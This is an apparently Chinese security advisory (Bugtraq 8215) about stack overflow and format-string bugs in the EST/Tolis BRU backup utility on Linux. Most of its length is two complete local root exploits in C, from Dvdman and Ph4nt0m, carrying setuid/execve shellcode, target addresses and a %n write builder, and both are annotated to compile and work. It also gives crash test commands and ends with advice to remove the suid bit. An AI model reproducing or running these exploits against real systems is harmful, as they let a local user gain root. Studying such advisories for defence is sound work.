Tolis Group BRU不正确命令选项解析漏洞
发布日期:2003-07-16
更新日期:2003-07-24
受影响系统:
Tolis Group BRU 17.0 Linux
描述:
BUGTRAQ ID: 8215
EST BRU是一款Linux备份工具。
EST BRU没有正确解析命令行选项,本地攻击者可以利用这些漏洞以高权限在系统上执行任意指令。
EST BRU存在格式串漏洞和普通的栈缓冲区溢出漏洞:攻击者以超长字符串或格式字符串作为/bin/bru的命令行参数,可破坏进程内存;精心构造的参数可在bru以suid方式安装时,以文件所有者(通常为root)的权限在系统上执行任意指令。
默认情况下/bin/bru不以suid属性安装,不过安装手册有指示如何设置suid属性。
<*来源:KF (dotslash@snosoft.com)
链接:http://www.securiteam.com/unixfocus/5XP0H20AKU.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)
elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)
DVDMAN(DVDMAN@L33TSECURITY.COM) 提供了如下测试程序:
/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
**
** By: Dvdman@l33tsecurity.com
**
** Simple Stack overflow Wont say any more :P
**
** Linux & FreeBsd Targets
**
** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
**
** Public Release
** L33tsecurity 2003; irc.secsup.org #l33tsecurity
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>
#define FUN "./bru"
/* Payload handed to bru as its only environment string (see main()): a
 * sled of 0x90 NOPs and a few 0xfc (cld) filler bytes, then 32-bit Linux/x86
 * shellcode.  Reading the bytes: int 0x80 with eax=0x46 (setreuid(0,0) on
 * i386 Linux), then execve("/bin//sh", {"/bin//sh", NULL}, NULL) with
 * eax=0x0b, then exit with eax=1.  The whole string must stay NUL-free so
 * it survives intact as an environment string. */
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* SETUID(0) SHELLCODE LINUX */
/* 0xfc = cld: harmless single-byte filler between the sled and the code */
"\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
"\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
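/*
 * Return the current stack pointer (its low 32 bits).  Debug helper for
 * calibrating the return-address guess; nothing in this program calls it.
 * x86-only: it reads %esp with inline assembly and is meaningless elsewhere.
 * The original had no return statement and relied on the value being left
 * in %eax, which is undefined behaviour in C; the asm output constraint
 * makes the hand-off to the return value explicit.
 */
unsigned long sp(void) {
    unsigned int esp;
    __asm__ volatile ("movl %%esp, %0" : "=r" (esp));
    return esp;
}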
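/*
 * Entry point: build the oversized argv[1] for the selected target and exec
 * ./bru with it, passing the shellcode as the process's only environment
 * string.  argv[1] is the target number printed by usage(): 0 = Linux,
 * 1 = FreeBSD.  Returns EXIT_FAILURE on bad arguments or if execve() fails;
 * on success the process image is replaced and main() never returns.
 */
int main(int argc, char **argv) {
    int usage(void);             /* defined below main(); declared so the call is prototyped */
    /* 9000 bytes of payload plus the NUL that execve() needs to find the end
     * of the argument string (the original filled all 9000 bytes and left
     * the string unterminated, so the exec read past the array). */
    char buffer[9000 + 1];
    char *env[2];
    char *args[3];
    char *end;
    long target;
    size_t fill, i;
    unsigned int word;
    /* Guess for where the shellcode lands: 0xbffffffa (presumably the top of
     * a classic 32-bit Linux user stack) minus the env string and program
     * name that the kernel places there. */
    unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);

    if (argc != 2) {
        usage();
        return EXIT_FAILURE;
    }
    /* strtol instead of atoi so junk such as "abc" is rejected instead of
     * being silently treated as target 0 */
    target = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0') {
        usage();
        return EXIT_FAILURE;
    }
    switch (target) {
    case 0:  /* Linux: guessed address (the +1 is the author's adjustment) */
        fill = 9000;
        word = (unsigned int)(ret + 1);
        break;
    case 1:  /* FreeBSD: fixed address supplied by the author */
        fill = 3500;
        word = 0xbfbffe48u;
        break;
    default: /* the original ran bru with an uninitialised buffer here */
        usage();
        return EXIT_FAILURE;
    }
    /* Emit the address as little-endian 32-bit words: the target is x86, so
     * the payload must not depend on the host's int size or endianness (the
     * original stored native ints through an int pointer into the buffer). */
    for (i = 0; i + 4 <= fill; i += 4) {
        buffer[i]     = (char)(word & 0xffu);
        buffer[i + 1] = (char)((word >> 8) & 0xffu);
        buffer[i + 2] = (char)((word >> 16) & 0xffu);
        buffer[i + 3] = (char)((word >> 24) & 0xffu);
    }
    buffer[fill] = '\0';

    /* put in env */
    env[0] = shellcode;
    env[1] = NULL;
    args[0] = FUN;
    args[1] = buffer;
    args[2] = NULL;
    execve(args[0], args, env);
    perror("execve");            /* only reached if the exec failed */
    return EXIT_FAILURE;
}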
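/*
 * Print the command-line help and the numeric target list to stdout.
 * Always returns 0; callers decide the exit status themselves.
 */
int usage(void) {
    printf("EST BRU(TM)local root exploit\n");
    printf("By: Dvdman@l33tsecurity.com\n");
    printf("Usage: ./ex_bru target\n");
    printf("TARGET LIST:\n");
    printf("0. LINUX\n1. FREEBSD\n");
    return 0;
}
Ph4nt0m Security Team 提供了如下测试程序: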
/*
*by jsk for bru-format-root-ex
*Ph4nt0m Security Team
*web:www.ph4nt0m.org
*public---ex ^^ :)
*test in redhat 8.0
*bash-2.05b$ ls -al bru
*-rws--x--x 1 root bin 165836 11月 29 1999 bru
*bash-2.05b$ id
*uid=37(rpm) gid=37(rpm) groups=37(rpm)
* bash-2.05b$ ./bruex
*Use shellcode 0xc4ffff65
* sh-2.05b#
*ths : sam from SST Group
*/
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <errno.h>
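#define MAX_FMT_LENGTH 128   /* bytes available for the %x/%n part of the payload */
#define ADD 0x100            /* window step: each %n lands in the next 0x100-sized window */
/* Four target addresses of four bytes each.  The original used
 * sizeof(size_t) * 4, which is 32 on LP64 hosts and breaks the width
 * arithmetic in build_un(); the payload is for an ILP32 target and the
 * format string writes exactly 16 address bytes. */
#define FOUR (4 * 4)
#define HELL "./bru"         /* path of the setuid bru binary to exec */
/* Split a 32-bit address into its four bytes (b0 is the most significant)
 * and bail out if any of them is zero: a NUL would terminate the argv
 * string and truncate the payload.  The zero test used to be a product
 * b0*b1*b2*b3 == 0, which overflows int (undefined) for large bytes. */
#define OCT( b0, b1, b2, b3, addr, str ) do { \
    b0 = ((addr) >> 24) & 0xff; \
    b1 = ((addr) >> 16) & 0xff; \
    b2 = ((addr) >> 8) & 0xff; \
    b3 = (addr) & 0xff; \
    if ( (b0) == 0 || (b1) == 0 || (b2) == 0 || (b3) == 0 ) { \
        printf( "\n%s contains a NUL byte. Leaving...\n", (str) ); \
        exit( EXIT_FAILURE ); \
    } \
} while (0)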
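/* shell by sam */
/* Payload handed to bru as its only environment string (see main()): a
 * 0x90 NOP sled followed by 32-bit Linux/x86 shellcode.  Reading the bytes:
 * int 0x80 with eax=0x17 (setuid(0)), then the classic jmp/call/pop
 * execve("/bin/sh") sequence with eax=0x0b, then exit with eax=1.  The
 * trailing "X" is the byte the code overwrites with NUL at run time to
 * terminate "/bin/sh", so the string itself stays NUL-free.
 * (The original comment line had lost its asterisks and did not compile.) */
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* shellcode */
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";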
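/*
 * Build the format-string payload for bru's argv[1] into buf.
 *
 * Layout written to buf:
 *   [locaddr][locaddr+1][locaddr+2][locaddr+3]      FOUR bytes, little-endian
 *   "%<w0>x%<offset>$n%<w1>x%<offset+1>$n..."      four positional %n writers
 * Each %n stores the running output count into one of the four addresses,
 * so retaddr is written one byte at a time, least significant byte first;
 * the %x widths are chosen so the count's low byte equals the wanted byte
 * at each step, climbing through ADD-sized windows starting above base.
 *
 * locaddr - address to overwrite (must contain no NUL byte)
 * retaddr - value to write there (must contain no NUL byte)
 * offset  - printf argument position at which bru sees the start of buf
 * base    - bytes bru has already printed before our %x's run
 *
 * buf must hold at least FOUR + MAX_FMT_LENGTH bytes.  Returns the length
 * of the %x/%n part as reported by snprintf; a value >= MAX_FMT_LENGTH
 * means it was truncated and the payload is unusable.  Exits via OCT() if
 * an address byte is zero, and here if locaddr+3 would carry into a NUL
 * byte or if the first width is not positive (the arithmetic assumes it).
 */
int build_un( char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int
offset, unsigned int base )
{
    unsigned char b0, b1, b2, b3;
    /* first window boundary above base: the count only ever grows, so each
     * target byte must be reachable in a fresh window */
    int start = ( (int)(base / ADD) + 1 ) * ADD;
    int w0, w1, w2, w3;
    int sz;

    /* : where to overwrite */
    OCT( b0, b1, b2, b3, locaddr, "[ locaddr ]" );
    /* the following three addresses add 1..3 to the low byte; a carry
     * would produce a 0x00 that terminates the argv string */
    if ( b3 > 0xff - 3 ) {
        printf( "\n[ locaddr ] + 3 carries into a NUL byte. Leaving...\n" );
        exit( EXIT_FAILURE );
    }
    sz = snprintf( buf, FOUR + 1, /* 16 chars to hold the 4 addresses, + 1 for the \0 */
        "%c%c%c%c"
        "%c%c%c%c"
        "%c%c%c%c"
        "%c%c%c%c",
        b3, b2, b1, b0,
        b3 + 1, b2, b1, b0,
        b3 + 2, b2, b1, b0,
        b3 + 3, b2, b1, b0 );
    if ( sz != FOUR ) {
        printf( "\nsnprintf failed while writing the addresses. Leaving...\n" );
        exit( EXIT_FAILURE );
    }

    /* where is our shellcode ? */
    OCT( b0, b1, b2, b3, retaddr, "[ retaddr ]" );
    /* All width arithmetic in int.  The original mixed size_t (FOUR) and
     * unsigned (base) into the first width and printed it with %d, which is
     * a format/argument mismatch on LP64 hosts and mis-prints if negative. */
    w0 = (int)b3 - FOUR + start - (int)base;
    w1 = (int)b2 - (int)b3 + start;
    w2 = (int)b1 - (int)b2 + start;
    w3 = (int)b0 - (int)b1 + start;
    if ( w0 <= 0 ) {
        printf( "\nfirst pad width is not positive (base too close to a window edge). Leaving...\n" );
        exit( EXIT_FAILURE );
    }
    return snprintf( buf + sz, MAX_FMT_LENGTH,
        "%%%dx%%%u$n%%%dx%%%u$n%%%dx%%%u$n%%%dx%%%u$n",
        w0, offset,
        w1, offset + 1,
        w2, offset + 2,
        w3, offset + 3 );
}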
/*
* main function
*
*/
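/*
 * Entry point: build the format-string payload with the author's RedHat 8.0
 * constants and exec ./bru with it as argv[1] and the shellcode as the only
 * environment string.  Returns EXIT_FAILURE if the payload does not fit or
 * execve() fails; on success the process image is replaced.
 */
int main(void)
{
    unsigned long ret_addr;
    char buf[256];
    char *args[3];
    char *env[2];
    int fmt_len;

    /* Informational only: where the shellcode is expected to sit under the
     * author's setup.  The address actually written is the literal passed
     * to build_un() below, not this value.  The original kept it in an int
     * and printed it with %x; unsigned long + %lx prints the same digits. */
    ret_addr = 0xc4fffffaUL - strlen(shellcode) - strlen(HELL);

    /* put in env */
    env[0] = shellcode;
    env[1] = NULL;
    printf ("Use shellcode 0x%lx\n", ret_addr);

    memset(buf, 0, sizeof(buf));
    /* 0x08070148: slot to overwrite; 0x97d7d741: value to write; 73: printf
     * argument position of buf on bru's stack; 3: assumed bytes already
     * printed before the payload.  All four are the author's RedHat 8.0
     * findings (see the header comment) and are not derived at run time. */
    fmt_len = build_un(buf, 0x08070148, 0x97d7d741, 73 ,3);
    if (fmt_len < 0 || fmt_len >= MAX_FMT_LENGTH) {
        /* snprintf inside build_un() truncated: the %n chain is incomplete */
        fprintf(stderr, "format payload truncated (%d bytes)\n", fmt_len);
        return EXIT_FAILURE;
    }

    args[0] = HELL;
    args[1] = buf;
    args[2] = NULL;
    execve (args[0], args, env);
    perror ("execve");   /* only reached if the exec failed */
    return EXIT_FAILURE;
}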
建议:
厂商补丁:
Tolis Group
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布前,可去掉/bin/bru的suid位(chmod u-s /bin/bru):去掉suid后bru只以调用者自身的权限运行,本地提权风险随之消除。
http://www.tolisgroup.com/main.html